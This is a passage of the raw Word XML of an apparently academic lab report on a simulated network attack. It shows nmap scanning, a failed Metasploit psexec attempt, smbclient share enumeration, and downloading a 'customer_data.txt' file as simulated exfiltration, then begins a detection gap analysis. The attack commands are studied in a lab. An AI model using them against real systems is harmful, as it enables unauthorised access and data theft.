      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Windows_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606F5AE0" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The scan showed the port 445 (SMB) to be open, which shows the availability of file-sharing service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE235C" w14:textId="4B5B5B7A" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67C45212" wp14:editId="1073F3C4">
            <wp:extent cx="4518660" cy="1844040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="36927015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8660" cy="1844040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F5982"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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:Nmap scan confirming SMB service exposure on Windows system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639CF4E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D2BF92" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">The attacker tried to use the Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> module to exploit the system with valid user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C34E1" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41558AB5" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>set RHOSTS &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Windows_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B71C0C" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BBA71D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A06EA90" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>set LHOST &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kali_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066166CA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B10A01" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:lastRenderedPageBreak/>
        <w:t>Nonetheless, the exploitation attempt was unsuccessful with an error of ACCESS DENIED, which means that the credentials provided did not have the administrative privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9B229" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Although the exploit failed to work, the attacker could successfully authenticate with SMB and list the available shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D94BB04" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -L //&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Windows_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;/ -U &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7666B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The output showed administrative shares like C$ and ADMIN, which proved authentic authentication and access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80C1CF" w14:textId="0D6282B5" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718D5F12" wp14:editId="76C5628C">
            <wp:extent cx="5737860" cy="1546860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14681834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7860" cy="1546860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597D8BF" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:Successful SMB authentication and enumeration of shared resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D62FA38" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79260038" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc228059727"/>
      <w:bookmarkStart w:id="98" w:name="_Toc228127144"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>5.3 Exploit 3 — Data Exfiltration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="41E3684B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>During the last phase, the attacker showed data exfiltration out of the compromised environs. On the Windows system, a shared folder was created with sensitive information to simulate it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24DA24" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>This folder was shared, and it was accessible via SMB protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD16933" w14:textId="7E802170" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="578520E9" wp14:editId="32D3B2D3">
            <wp:extent cx="5730240" cy="4198620"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="57227026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4198620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDA65D"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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:Enabling file sharing to simulate data exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA419A6" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878C34E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The attacker proceeded to get into the shared directory of the Kali machine via SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE9648B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> //&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Windows_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;/Data -U &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C32733" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>After being authenticated successfully, the attacker enumerated the list of files available and downloaded the sensitive file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C3AF5D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B4279" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>get customer_data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA204EF" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The file was accessed on the attacker machine to ensure that data exfiltration was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA40AA9" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cat customer_data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639B3F5" w14:textId="1F46E5BE" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="294C6FB9" wp14:editId="088CDEAA">
            <wp:extent cx="4351020" cy="1996440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="3147034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51020" cy="1996440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9B18B"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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Verification of exfiltrated data on the attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DCFEC8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D271DF6" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc228059728"/>
      <w:bookmarkStart w:id="100" w:name="_Toc228127145"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6. Detection Gap Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="10B5685F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The detection gap analysis assesses why the simulated attack has not been detected or prevented at various points during the engagement. This section identifies vulnerabilities in security controls, monitoring capabilities, and organisational practices which enabled the attacker to advance through the attack lifecycle with few challenges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A71BDAF" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc228059729"/>
      <w:bookmarkStart w:id="102" w:name="_Toc228127146"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>6.1 Reconnaissance Phase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="1886ACC2" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>As part of reconnaissance, the attacker actively scanned the network with Nmap to determine live hosts and open ports. No intrusion detection or prevention systems (IDS/IPS) were present in the environment, and hence this activity was not detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019E3B37" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The absence of network monitoring tools implied that the unusual scanning behaviour, like multiple port probes, was not detected. In practice, in a real-world setting, this scanning activity would normally result in alerts in a Security Information and Event Management (SIEM) system or network-based IDS. Lack of these controls enabled the attacker to obtain vital information on exposed services without any opposition (Scarfone and Mell, 2017).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E524AF4" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc228059730"/>
      <w:bookmarkStart w:id="104" w:name="_Toc228127147"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>6.2 Initial Access and Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="26123F4C" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">The vulnerable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> service on the Metasploitable2 system was exploited successfully because of the availability of an old and unpatched service. They had not put in place a vulnerability management or patching process to detect and fix known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512FE9F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Also, web application firewalls (WAFs) and host-based intrusion detection systems (HIDS) were not in place to track suspicious activity. Consequently, the attempt to exploit did not create any alerts or logs that would have initiated an incident response. This indicates a major flaw in preventative and detective controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BED7D7" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc228059731"/>
      <w:bookmarkStart w:id="106" w:name="_Toc228127148"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>6.3 Execution and System Compromise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
